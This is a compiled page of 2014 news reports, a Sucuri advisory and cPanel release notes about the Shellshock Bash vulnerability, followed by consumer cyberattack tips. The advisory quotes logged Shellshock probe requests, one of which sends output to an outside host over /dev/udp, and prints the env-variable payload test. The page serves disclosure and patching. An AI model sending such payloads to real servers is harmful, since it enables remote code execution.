Hackers Exploit Shellshock Vulnerability to Gain Access to Yahoo Servers

Romanian hackers have exploited the Shellshock vulnerability to gain access to Yahoo servers, according to Jonathan Hall of security consulting company Future South Technologies. Hall announced the hack of Yahoo, as well as Lycos and WinZip, on the Future South blog after informing the companies and the FBI.

According to a series of blog posts, Hall discovered the vulnerabilities on Saturday night, and watched overnight as the exploit expanded. Hall claims he began attempting to alert Yahoo before 5 am CST, but that it, like the other two companies, was slow to respond.

WinZip confirmed to Hall that they were hacked, while Lycos initially denied that it had been breached, and subsequently admitted the need for further testing. Yahoo confirmed that it had been breached midday on Sunday, and on Monday Yahoo CISO Alex Stamos posted a response to the incident to Hacker News.

“Earlier today, we reported that we isolated a handful of servers that were detected to have been impacted by a security flaw. After investigating the situation fully, it turns out that the servers were in fact not affected by Shellshock,” Stamos said. “Regardless of the cause our course of action remained the same: to isolate the servers at risk and protect our users’ data. The affected API servers are used to provide live game streaming data to our Sports front-end and do not store user data. At this time we have found no evidence that the attackers compromised any other machines or that any user data was affected. This flaw was specific to a small number of machines and has been fixed, and we have added this pattern to our CI/CD code scanners to catch future issues.”

Stamos also responded to allegations by Hall that Yahoo had been slow to react to the breach, saying that the affected systems had been isolated and the investigation begun within an hour of the email Hall addressed to CEO Marissa Mayer.

Hall in turn responded to Stamos, at first accusing him of giving misleading information, and then trashing Stamos’ explanation for how the breach really occurred.

“I’m not saying for a fact that more than what they are saying was compromised was,” said Hall. “But what I am saying for a fact is that there’s no way in hell they can be certain when they can’t even honestly provide a technical explanation of how the breach occurred in the first place.”

The Independent notes Yahoo’s reputation for underappreciating bug bounty hunters. Yahoo gave a $25 voucher to an ethical hacker who disclosed three bugs in Yahoo servers last year.

by Chris Burt on October 7, 2014

Hackers thrash Bash Shellshock bug: World races to cover hole

Sysadmins and users have been urged to patch the severe Shellshock vulnerability in Bash on Linux and Unix systems – as hackers ruthlessly exploit the flaw to compromise or crash computers.

But as “millions” of servers, PCs and devices lay vulnerable or are being updated, it’s emerged the fix is incomplete.

The flaw affects the GNU Bourne Again Shell – better known as Bash – which is a widely installed command interpreter used by many Linux and Unix operating systems – including Apple’s OS X.

It allows miscreants to remotely execute arbitrary code on systems ranging from web servers, routers, servers and Macs to various embedded devices that use Bash, and anything else that uses the flawed open-source shell.

An attacker needs to inject his or her payload of code into the environment variables of a running process – and this is surprisingly easy to do, via Apache CGI scripts, DHCP options, OpenSSH and so on. When that process or its children invoke Bash, the code is picked up and executed.

The Bash flaw – designated CVE-2014-6271 – is being exploited in the wild against web servers, which are the most obvious targets but not by any means the only machines at risk.

Patches released on Wednesday by Linux vendors, the upstream maintainer of Bash, and others for OS X, blocked these early attacks, but it’s understood they do not completely protect Bash from code injection via environment variables.

New packages of Bash were rolled out on the same day, but further investigation made it clear that the patched version is still exploitable, and at the very least can be crashed due to a null-pointer exception. The incomplete fix is being tracked as CVE-2014-7169.

Red Hat, at time of writing, is urging people to upgrade to the version of Bash that fixes the first reported security hole, and not wait for the patch that fixes the secondary lingering vulnerability – designated CVE-2014-7169.

“CVE-2014-7169 is a less severe issue and patches for it are being worked on,” the Linux maker said.

Meanwhile, although Ubuntu and other Debian-based distros have moved to using the non-vulnerable Dash over Bash, the latter may well be present or in use by user accounts. Above all, check what shell interpreters are installed, who is using them, and patch CVE-2014-6271 immediately.

By John Leyden, 25 Sep 2014

Bash Vulnerability – Shell Shock – Thousands of cPanel Sites are High Risk

The team behind the Bash project (the most common shell used on Linux) recently issued a patch for a serious vulnerability that could allow for remote command execution on servers running the vulnerable bash versions.

Wait, remote command execution on bash? You are likely asking yourself, “How can someone remotely execute commands on a local shell?”

The issue starts with mod_cgi and how web servers interact with CGI programs (which could be written in Perl, PHP, shell script or any other language). The web server passes user-supplied values to them as environment variables so they can do their work. In simple terms, this vulnerability allows an attacker to pass a command in one of those variables that then gets executed by bash.

It means that if you are using mod_cgi on your webserver and you have a CGI written in shell script, you are in deep trouble. Drop everything now and patch your servers.

If you have CGIs written in any other language, but you are using “system()”, “(backticks)” or executing any commands from the CGI, you are in deep trouble. Drop everything now and patch your servers.

If you don’t know what you have, drop everything now and patch your servers.
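The Register’s advice earlier on this page to check which shell interpreters are installed and who is using them, and the point here that any CGI interpreted by Bash (or shelling out from Perl, PHP or another language) is exposed, both come down to an inventory. The script below is an added example, not code from the Sucuri post, The Register or cPanel; the function names find_bash_cgi and list_bash_users and the grep heuristic are assumptions of this example, and it treats #!/bin/sh as a shell shebang worth listing because /bin/sh is Bash on Red Hat-family systems.

```sh
#!/bin/sh
# Added example, not code from the Sucuri post, The Register or cPanel:
# two inventory helpers for the questions the advisories raise. Function
# names and the heuristics are assumptions of this example.

# find_bash_cgi DIR...: print CGI scripts under each DIR that Bash would
# interpret, or that are written in another language but spawn a shell.
# "#!/bin/sh" is listed too, because /bin/sh is Bash on Red Hat-family systems.
find_bash_cgi() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -type f | while IFS= read -r f; do
            shebang=$(head -n 1 "$f" 2>/dev/null)
            case "$shebang" in
                '#!'*bash*|'#!/bin/sh'*|'#!/usr/bin/sh'*|'#!/usr/bin/env sh'*)
                    echo "$f: interpreted by a shell ($shebang)"
                    continue ;;
            esac
            # Perl/PHP/Python CGIs that call system(), backticks, exec(),
            # popen() or shell_exec() hand their environment to a shell;
            # this is a heuristic grep, so review the hits by hand.
            if grep -Eq 'system[[:space:]]*\(|`|shell_exec|exec[[:space:]]*\(|popen[[:space:]]*\(' "$f"; then
                echo "$f: spawns a subprocess ($shebang)"
            fi
        done
    done
}

# list_bash_users [PASSWD_FILE]: accounts whose login shell is Bash, i.e.
# the "who is using them" half of the check (default /etc/passwd).
list_bash_users() {
    awk -F: '$7 ~ /\/bash$/ { print $1 }' "${1:-/etc/passwd}"
}
```

Run it as `find_bash_cgi /usr/lib/cgi-bin /usr/local/cpanel/cgi-sys` (paths will differ per host) and `list_bash_users` on each server. A hit does not prove exploitability, but every listed script is one that would receive attacker-controlled environment variables through a vulnerable Bash, so it belongs at the top of the patch-and-verify list.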

Who is vulnerable?

Almost every server on the Internet is vulnerable to it (every server has Bash). But not all sites are actually exploitable.

I mean, who really still uses mod_cgi instead of mod_php or FastCGI, which would be safe? Or who would write a CGI in shell script?

cPanel users at Risk

Well, turns out cPanel does that for some of their internal tools.

As we started to scan our clients sites (and the Internet as a whole) we found that about 2.9% of all sites we scanned were vulnerable to this problem. All of them were running cPanel and had these 2 files available:
/cgi-sys/entropysearch.cgi
/cgi-sys/FormMail-clone.cgi

When we talk about millions of websites online, 2.9% is a lot. Just from our investigation, we found thousands of websites vulnerable and easily compromised.

If you are using cPanel, you have to patch your servers right away (or remove these files from the server)!

For Sucuri clients, sites behind our Website Firewall / WAF are already protected against it.

But we still recommend patching.

Attacks in the Wild

We are seeing many scans for this vulnerability in the wild, but mostly coming from security researchers trying to understand the severity of it (nothing really bad yet). So far, these two IP addresses (166.78.61.142, 24.251.197.244) are hitting every site they can, trying to trigger the vulnerability:

166.78.61.142 - - [25/Sep/2014:06:28:47 -0400] "GET / HTTP/1.1" 200 193 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"

24.251.197.244 - - [25/Sep/2014:07:49:36 -0400] "GET / HTTP/1.1" 200 193 "-" "() { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq"
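The two log lines above show the marker defenders can key on: the Bash function-definition prefix `() {` sitting in a request field that the web server would export into the CGI environment (here the User-Agent). The awk-based check below is an added example, not part of the Sucuri post; it assumes the Apache combined log format shown above, a hypothetical function name shellshock_hits, and the sample lines in the usage are constructed with documentation-range addresses.

```sh
#!/bin/sh
# Added example, not from the Sucuri post: flag Shellshock probes in an Apache
# combined-format access log. The signature is the Bash function-definition
# prefix "() {" in a request field that mod_cgi exports as an environment
# variable (the request line, Referer or User-Agent).

# shellshock_hits LOGFILE: print "ip timestamp field" for each line that
# carries the marker, where field names the header that carried it.
shellshock_hits() {
    awk '
        # "() {" with optional whitespace before the brace, anywhere on the line
        /\(\)[[:space:]]*[{]/ {
            ip = $1
            ts = $4                 # looks like [25/Sep/2014:06:28:47
            sub(/^\[/, "", ts)
            # Split on double quotes: q[2] is the request line, q[4] the
            # Referer and q[6] the User-Agent in the combined log format.
            split($0, q, "\"")
            field = "request-line"
            if (q[6] ~ /\(\)[[:space:]]*[{]/)      field = "user-agent"
            else if (q[4] ~ /\(\)[[:space:]]*[{]/) field = "referer"
            print ip, ts, field
        }' "$1"
}
```

Run it as `shellshock_hits /var/log/httpd/access_log` (the quick equivalent is `grep -E '\(\)[[:space:]]*\{' access_log`). A hit only means the probe reached the server; whether it succeeded depends on which path it hit and whether a CGI handed the headers to a vulnerable Bash, so correlate hits against the CGI paths you actually serve and against unexpected outbound connections, since the first probe above tries to phone home over UDP.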

We have not detected any massive scans looking for real CGI that would be vulnerable (that’s where the problem lies).

Even if you are using mod_php for your web application (like WordPress or Joomla), you have to make sure that mod_cgi is not enabled for things like your cPanel backend, Plesk or any other management tool.

In a few more days we will see real scans and actual attacks attempting to exploit this Shell Shock vulnerability.

NIX System Administrators

You’re in luck with this one: identifying whether you’re vulnerable is easier than with previous vulnerabilities. Log into your server and via terminal run this command:
[root@yourawesomeserver ~]# env x='() { :;}; echo vulnerable' bash -c 'echo hello'

If you are vulnerable it will return:
[root@yourawesomeserver ~]# env x='() { :;}; echo vulnerable' bash -c 'echo hello'
vulnerable
hello

The fix depends on your NIX distribution, but you will want to reinstall or update, whichever you prefer:
# sudo apt-get install bash

– or –

# sudo yum update bash

Once complete, rerun the test and you will get:
[root@yourawesomeserver ~]# env x='() { :;}; echo vulnerable' bash -c 'echo hello'
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
hello

By Daniel Cid on September 25, 2014

Bug in Bash shell creates big security hole on anything with *nix in it

UPDATE, 9/25: The Bash vulnerability, now dubbed by some as “Shellshock,” has reportedly been found in use by an active exploit against Web servers. Additionally, the initial patch for the vulnerability was incomplete and still allows attacks to succeed, according to a new CERT alert. See Ars’ latest report for further details; our initial report is below.

A security vulnerability in the GNU Bourne Again Shell (Bash), the command-line shell used in many Linux and Unix operating systems, could leave systems running those operating systems open to exploitation by specially crafted attacks. “This issue is especially dangerous as there are many possible ways Bash can be called by an application,” a Red Hat security advisory warned.

The bug, discovered by Stéphane Chazelas, is related to how Bash processes environment variables passed by the operating system or by a program calling a Bash-based script. If Bash has been configured as the default system shell, it can be used by network-based attackers against servers and other Unix and Linux devices via Web requests, secure shell, telnet sessions, or other programs that use Bash to execute scripts.

Because of its wide distribution, the vulnerability could be as wide-ranging as the Heartbleed bug, though it may not be nearly as dangerous. The vulnerability affects versions 1.14 through 4.3 of GNU Bash. Patches have been issued by many of the major Linux distribution vendors for affected versions, including:
• Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution
• CentOS (versions 5 through 7)
• Ubuntu 10.04 LTS, 12.04 LTS, and 14.04 LTS
• Debian

A test on Mac OS X 10.9.4 (“Mavericks”) by Ars showed that it also has a vulnerable version of Bash. Apple has not yet patched Bash, though it just issued an update to “command line tools.”

While Bash is often thought of just as a local shell, it is also frequently used by Apache servers to execute CGI scripts for dynamic content (through mod_cgi and mod_cgid). A crafted web request targeting a vulnerable CGI application could launch code on the server. Similar attacks are possible via OpenSSH, which could allow even restricted secure shell sessions to bypass controls and execute code on the server. And a malicious DHCP server set up on a network or running as part of an “evil” wireless access point could execute code on some Linux systems using the Dynamic Host Configuration Protocol client (dhclient) when they connect.

There are other services that run on Linux and Unix systems, such as the CUPS printing system, that are similarly dependent on Bash and could be vulnerable.

There is an easy test to determine if a Linux or Unix system is vulnerable. To check your system, from a command line, type:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If the system is vulnerable, the output will be:
vulnerable
this is a test

An unaffected (or patched) system will output:
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

The fix is an update to a patched version of the Bash shell. To be safe, administrators should do a blanket update of their versions of Bash in any case.
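Both the Sucuri and Ars write-ups on this page use the same one-line test for CVE-2014-6271. The function below is an added example, not code from either article, that wraps that test so it can be run across many hosts: it reports a status word and an exit code, inspects only stdout (a patched build’s warnings go to stderr), and handles a host where the named interpreter is absent. The name shellshock_status and its optional SHELL_BIN argument are assumptions of this example, and it checks only CVE-2014-6271, not the follow-up CVE-2014-7169.

```sh
#!/bin/sh
# Added example, not from the Sucuri or Ars articles: the one-line Shellshock
# test wrapped as a function with a status word and exit code, for use from
# fleet-wide inventory scripts. SHELL_BIN is an assumed parameter.

# shellshock_status [SHELL_BIN]: prints "vulnerable", "patched", "missing" or
# "unknown"; returns 0 only when the shell is patched against CVE-2014-6271.
shellshock_status() {
    shell_bin=${1:-bash}
    if ! command -v "$shell_bin" >/dev/null 2>&1; then
        echo missing
        return 2
    fi
    # A vulnerable Bash imports the function body from the environment
    # variable and runs the trailing command, so "vulnerable" appears before
    # "hello". A patched Bash refuses the import (warning on stderr) and only
    # prints the marker from -c. Only stdout is inspected here.
    out=$(env x='() { :;}; echo vulnerable' "$shell_bin" -c 'echo hello' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo vulnerable; return 1 ;;
        *hello*)      echo patched;    return 0 ;;
        *)            echo unknown;    return 2 ;;
    esac
}
```

Call `shellshock_status` for the default Bash, or `shellshock_status /usr/local/bin/bash` for a second copy installed outside the package manager, which is exactly the kind of stray interpreter a distribution update will not touch. After patching, rerun it and expect "patched" with exit status 0.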

Sean Gallagher / Sean is Ars Technica’s IT Editor. A former Navy officer, systems administrator, and network systems integrator with 20 years of IT journalism experience, he lives and works in Baltimore, Maryland.
@thepacketrat on Twitter

EasyApache to Install Apache 2.4 in Basic Profile – 60 Day Notice

In approximately 60 days, the Basic profile in EasyApache will build Apache 2.4 by default. This change will not alter existing EasyApache profiles that build Apache 2.2. If you plan to update from an existing Apache 2.2 installation to Apache 2.4, we strongly recommend that you build in a test environment before you migrate Apache versions on a production server.

Review the following links for more information on the differences between Apache 2.2 and 2.4:

http://documentation.cpanel.net/display/EA/Critical+Changes+In+Apache+2.4

http://httpd.apache.org/docs/trunk/upgrading.html

cPanel EasyApache 3.26.8 Released

cPanel, Inc. has released EasyApache 3.26.8 with Curl version 7.38. This release addresses vulnerabilities related to CVE-2014-3613 and CVE-2014-3620.

AFFECTED VERSIONS
All versions of Curl 7.1 through 7.37.1

SECURITY RATING
The National Vulnerability Database (NIST) has given the following severity ratings to these CVEs:

CVE-2014-3613 – MEDIUM

Curl 7.38
Fixed bug in libcurl related to CVE-2014-0118.

CVE-2014-3620 – MEDIUM

Curl 7.38
Fixed bug in libcurl related to CVE-2014-0231.

SOLUTION
cPanel, Inc. has released EasyApache 3.26.8 with an updated version of Curl to correct these issues. Unless you have disabled EasyApache updates, EasyApache updates automatically. Run EasyApache to rebuild your profile with the latest version of Curl.

REFERENCES
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3613
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3620
http://curl.haxx.se/docs/security.html#20140910A

cPanel EasyApache 3.26.7 Released

cPanel, Inc. has released EasyApache 3.26.7 with Apache version 2.2.29. This release addresses vulnerabilities CVE-2014-0118, CVE-2014-0231, CVE-2014-0226 and CVE-2013-5704. We encourage all Apache 2.2 users to upgrade to Apache version 2.2.29.

AFFECTED VERSIONS
All versions of Apache 2.2 before version 2.2.29.

SECURITY RATING
The National Vulnerability Database (NIST) has given the following severity ratings to these CVEs:

CVE-2014-0118 – MEDIUM

Apache 2.2.29
Fixed bug in the Deflate module related to CVE-2014-0118.

CVE-2014-0231 – MEDIUM

Apache 2.2.29
Fixed bug in the CGID module related to CVE-2014-0231.

CVE-2014-0226 – MEDIUM

Apache 2.2.29
Fixed a race condition related to CVE-2014-0226.

CVE-2013-5704 – MEDIUM

Apache 2.2.29
Fixed a bug in the Headers module related to CVE-2013-5704.

SOLUTION
cPanel, Inc. has released EasyApache 3.26.7 with an updated version of Apache 2.2 to correct these issues. Unless you have disabled EasyApache updates, EasyApache updates automatically. Run EasyApache to rebuild your profile with the latest version of Apache.

REFERENCES
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0118
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0231
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0226
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5704
http://apache.cs.utah.edu//httpd/CHANGES_2.2.29

cPanel & WHM 11.44 Now in STABLE Tier

cPanel, Inc. is thrilled to release cPanel & WHM software version 11.44, which will soon be available in the STABLE tier.

cPanel & WHM 11.44 offers a transfer and restore renovation, configuration clusters, a new edition of Paper Lantern, support access, and more.

Transfer & Restore Renovation
From simple log files and reports to a continuous transfer and restore process, a series of changes to transfer and restore functionality brings widespread benefits.

Configuration Clusters
cPanel & WHM now offers configuration clustering to streamline the process of updating multiple servers, adding a powerful boost in efficiency.

Paper Lantern
With a more agile, consistent framework, Paper Lantern for cPanel & WHM 11.44 signifies progress towards user interface perfection and stunning, user-created themes.

Support Access
Grant cPanel Support Access enables customers to quickly grant server access to cPanel support staff, therefore speeding up the resolution of issues with just a few mouse clicks.

Detailed information on all cPanel & WHM 11.44 features can be found at https://documentation.cpanel.net. An overview of the latest features and benefits is also available at http://releases.cpanel.net.

EasyApache 3.26.3 Released

cPanel, Inc. has released EasyApache 3.26.3 with PHP version 5.5.15, Libxslt version 1.1.28 and Libxml2 version 2.9.1. This release addresses PHP vulnerability CVE-2014-4670 by fixing a bug in the SPL component, CVE-2012-6139 by fixing a bug in Libxslt, and fixes bugs in Libxml2 to address the following CVEs: CVE-2012-5134, CVE-2013-0338, CVE-2013-0339, CVE-2013-1969, and CVE-2013-2877. We encourage all PHP 5.5 users to upgrade to PHP version 5.5.15, and all users to upgrade to Libxslt version 1.1.28 and Libxml2 version 2.9.1.

AFFECTED VERSIONS
All versions of PHP 5.5 before 5.5.15.
All versions of Libxslt before 1.1.28.
All versions of Libxml2 before 2.9.1.

SECURITY RATING
The National Vulnerability Database (NIST) has given the following severity ratings to these CVEs:

CVE-2014-4670 – MEDIUM

PHP 5.5.15
Fixed a bug in the SPL component related to CVE-2014-4670.

CVE-2012-6139 – MEDIUM

Libxslt 1.1.28
Fixed a bug in the Libxslt library related to CVE-2012-6139.

CVE-2012-5134 – MEDIUM

Libxml2 2.9.1
Fixed an out of bound access bug in the Libxml2 library related to CVE-2012-5134.

CVE-2013-0338 – MEDIUM

Libxml2 2.9.1
Fixed a bug in the Libxml2 library related to CVE-2013-0338.

CVE-2013-0339 – MEDIUM

Libxml2 2.9.1
Fixed a bug in the Libxml2 library related to CVE-2013-0339.

CVE-2013-1969 – HIGH

Libxml2 2.9.1
Fixed buffer conversion bugs related to CVE-2013-1969.

CVE-2013-2877 – MEDIUM

Libxml2 2.9.1
Fixed a bug in the Libxml2 library related to CVE-2013-2877.

SOLUTION
cPanel, Inc. has released EasyApache 3.26.3 with updated versions of PHP 5.5, Libxslt and Libxml2 to correct these issues. Unless you have disabled EasyApache updates, EasyApache updates automatically. Run EasyApache to rebuild your profile with the latest versions of PHP, Libxslt and Libxml2.

REFERENCES
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4670
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-6139
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5134
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0338
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0339
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1969
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2877
http://php.net/ChangeLog-5.php#5.5.15
http://xmlsoft.org/ChangeLog.html
http://xmlsoft.org/Libxslt/ChangeLog.html

Beware of These 4 Common and Dangerous Cyberattacks

Last week Google unveiled Project Zero, a new team dedicated to making Internet users less vulnerable to cyberattacks. From Heartbleed to Cryptolocker, the headlines are increasingly full of news about scary new threats that target the average Internet user.

“You know to delete that email that tells you you’ve won the lottery, so attackers have to change their approach over time,” Chris Weber, the co-founder of Casaba Security, told NBC News. “But really, these are new spins on old kinds of attacks.”

Here are four common and dangerous types of cyberattacks to watch out for — and how to avoid or fix them.

Ransomware

What it looks like: Ransomware falls under the large cyberattack umbrella of “malware” — malicious software — and it’s a particularly scary brand. It locks up a victim’s computer files and demands payment in exchange for unlocking them.

Internet Danger: What Is Ransomware?

Victims of ransomware usually see a pop-up warning that overtakes the device’s screen, blocking access and encrypting files. The message demands the victim pay hundreds of dollars to unlock the files and regain access to the computer.

What to do: While it’s tempting to pay the ransom, security experts say that’s a bad idea: There’s no guarantee the crooks will actually free the files, and funding criminal activity only fuels it.

Ransomware victims can try to remove the malicious program themselves using anti-virus software, or take the infected device to a computer repair shop. If the ransomware can be removed, sometimes that’s all that’s needed: if the files weren’t actually encrypted, they would be accessible again. But if the files were indeed encrypted as threatened, removing the ransomware won’t change that.

“Unfortunately this is one of those cases when if your data has been encrypted, there’s just nothing you can really do,” said Kevin Johnson, the CEO of cybersecurity consultancy Secure Ideas.

As with most malware, ransomware is often unwittingly downloaded when users open email attachments or click on links, so as always caution is advised.

Sketchy video sites that ask you to install a “codec” or update

What it is: Didn’t feel like paying to stream that new movie, eh? It can be tempting to watch it for “free” on a website that streams pirated video, but these disreputable sites are sometimes filled with potential cyberattacks.

In this type of attack, victims click what looks like a regular video player in an attempt to stream the content. But then a message pops up telling the user to install a “codec” or other kind of update in order to view the video. Victims who download the so-called update are actually installing malware on their own computers.

What to do: Be wary of any message that pushes you to download something in order to view a video. And it’s not only sketchy “free video” sites: spammy viral video clips that make their way around Facebook could also be malicious. (One of the exceptions is Netflix, which uses Microsoft Silverlight to stream video.)

“You really have very few reasons to have to install anything to watch content on the Internet,” Dave Aitel, the CEO of security firm Immunity Inc., told NBC News. “But people say, ‘I really want to watch that show, so I’ll click until the clip starts playing.'”

Malicious links in messaging apps and social networks

What it is: This threat is perhaps the most similar to attack methods that have been around a while. That old spam email that contains a malicious link or attachment isn’t dead; it has simply moved to networks where people are active, and where they think they can trust a network of friends.

“We know to be more careful about email, but getting infected now isn’t like it used to be,” Raj Samani, the chief technology officer for McAfee’s EMEA region, told NBC News. “It could be a link in a LinkedIn connection request that looks legitimate, or a Twitter direct message that is supposedly from a friend.”

On a mobile device, the malicious software could harvest contact information, secretly send calls and send texts to premium numbers and track a user’s location, for example.

What to do: Beyond the standard advice to avoid clicking on suspect links and files, Samani suggests mobile phone users install anti-virus programs that could catch the threats.

“Anti-virus is standard for most people on their desktop or laptop, but how many people do you know have it installed on mobile?” Samani said. His employer — McAfee — offers a free version of mobile anti-virus, as do companies such as Avast.

Fake Flappy Bird (and other popular apps)

What it is: The addictively simple (and temporarily pulled) mobile game Flappy Bird is lots of fun — but the hundreds of malicious clone apps lurking in app stores are quite the opposite.

“When an app gets even halfway popular — much less something as viral as Flappy Bird — app stores get so flooded that it’s hard to find the legitimate one,” Aitel said.

In Flappy Bird’s case, a report released last month from anti-virus company McAfee said hundreds of clones emerged in the first quarter of 2014 (after the legitimate app’s creator took it down). McAfee tested 300 of the clones and found that almost 80 percent of them contained malware.

Once downloaded, those malicious clones did very bad things with the victims’ phones, and in the worst cases, the malware gained full control of the infected device.

What to do: Carefully check before downloading an app from an app store: Check the creator’s name, the app’s description and the reviews among other information. Avoid giving any app sweeping permission to access parts of the phone, as tempting as it is to simply keep clicking “yes.” As with the previous threat, mobile anti-virus software can help mitigate or avoid the damage.

By Julianne Pepitone